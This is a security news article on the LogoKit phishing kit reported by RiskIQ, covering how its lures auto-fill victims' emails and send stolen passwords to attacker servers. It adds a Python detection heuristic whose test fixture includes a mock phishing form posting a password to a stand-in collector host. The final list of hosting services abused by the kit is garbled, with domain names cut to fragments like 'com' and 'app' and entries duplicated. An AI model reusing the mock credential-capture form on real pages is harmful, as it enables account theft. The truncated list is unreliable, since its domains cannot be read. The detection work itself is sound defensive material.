Threat actors are investing more in phishing kits to simplify and expand their phishing activities. Cybercriminals are developing new phishing strategies and exploring different attack avenues by leveraging innovative phishing kits, which are widely available on dark web markets. The growing demand for these kits on the underground market reflects how reliant attackers have become on such tools.
Security firm RiskIQ recently uncovered a new kind of phishing kit dubbed "LogoKit." The kit is designed to deploy malware easily and to be reused and adapted by other attackers.
How LogoKit Spreads
- The attacker sends the target an email containing a specially crafted malicious URL in which the target's email ID is hidden.
- Once the victim clicks the URL, it redirects them to a fake corporate website.
- The victim's email address is auto-filled into the email or username field to trick them into thinking they have previously logged into the site.
- If the victim enters their password, LogoKit sends the target's email and password to an external server operated by the threat actors.
- LogoKit allows attackers to easily compromise websites and embed the malware or malicious script in them.
RiskIQ claimed that LogoKit dupes users with simple login forms embedded in more complex HTML documents that impersonate other services, fetching those services' logos from a third-party source such as Clearbit or Google's favicon database. RiskIQ found more than 700 unique domains running LogoKit, targeting services such as SharePoint, Adobe Document Cloud, OneDrive, Office 365, and cryptocurrency exchanges.
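As an added example (not code from RiskIQ or the article), the following Python heuristic scores a landing page for the pattern described above: a target address carried in the URL, a brand logo fetched from a third-party logo service for that address's domain, and a password field that posts off-site. The logo-service hostnames and the sample URL and HTML are assumptions constructed for the example.

```python
import re
from urllib.parse import urlparse, unquote

# Logo-service hostnames are assumptions: the article names only "Clearbit"
# and "Google's favicon database", not the exact endpoints they serve from.
LOGO_SERVICE_HOSTS = ("logo.clearbit.com", "www.google.com")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
REF_RE = re.compile(r'(?:src|href|action)\s*=\s*["\']([^"\']+)["\']', re.I)
ACTION_RE = re.compile(r'<form[^>]+action\s*=\s*["\']([^"\']+)["\']', re.I)
PASSWORD_RE = re.compile(r'<input[^>]+type\s*=\s*["\']password["\']', re.I)

def email_in_url(url):
    """Return (email, domain) hidden in the URL's query or fragment, else None."""
    parsed = urlparse(url)
    for part in (parsed.query, parsed.fragment):
        m = EMAIL_RE.search(unquote(part))
        if m:
            return m.group(0), m.group(1).lower()
    return None

def assess(url, html):
    """Score a landing page for the LogoKit-style signals the article describes."""
    page_host = urlparse(url).hostname or ""
    found = email_in_url(url)
    target_domain = found[1] if found else None
    signals = {
        "email_in_url": found is not None,
        "fetches_victim_brand_logo": False,  # logo pulled for the target's domain
        "password_field": bool(PASSWORD_RE.search(html)),
        "posts_offsite": False,  # credentials leave the page's own host
    }
    for ref in REF_RE.findall(html):
        host = urlparse(ref).hostname or ""
        if host in LOGO_SERVICE_HOSTS and target_domain and target_domain in ref:
            signals["fetches_victim_brand_logo"] = True
    for action in ACTION_RE.findall(html):
        host = urlparse(action).hostname
        if host and host != page_host:
            signals["posts_offsite"] = True
    signals["likely_logokit"] = (signals["email_in_url"]
                                 and signals["fetches_victim_brand_logo"]
                                 and signals["password_field"])
    return signals

# Constructed sample: lure URL with the target address in the fragment and a
# minimal page in the style the article describes (hosts are placeholders).
SAMPLE_URL = "https://pages.example-host.test/docs/view.html#victim@example.com"
SAMPLE_HTML = """
<img src="https://logo.clearbit.com/example.com" alt="logo">
<form action="https://collector.example.test/post.php" method="post">
  <input type="email" id="email" value="">
  <input type="password" name="pw">
</form>
"""

if __name__ == "__main__":
    print(assess(SAMPLE_URL, SAMPLE_HTML))
```

Run over a crawler's captured URL and page body, a `likely_logokit` hit plus `posts_offsite` is a reasonable trigger for analyst review rather than an automatic block.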
According to RiskIQ, the following legitimate services have been used by LogoKit actors:
- me: Application Deployment Platform
- com: Google Cloud Platform
- app: Google Firebase
- com: Google Firebase
- googleapis.com: Google Cloud Storage
- googleapis.com: Google Firebase Storage
- amazonaws.com: Amazon S3 Object Storage
- app: Google CodeSandbox
- yandexcloud.net: Yandex Static Hosting
- io: GitHub Static Page Hosting
- com: DigitalOcean Object Storage
- com: Oracle Object Storage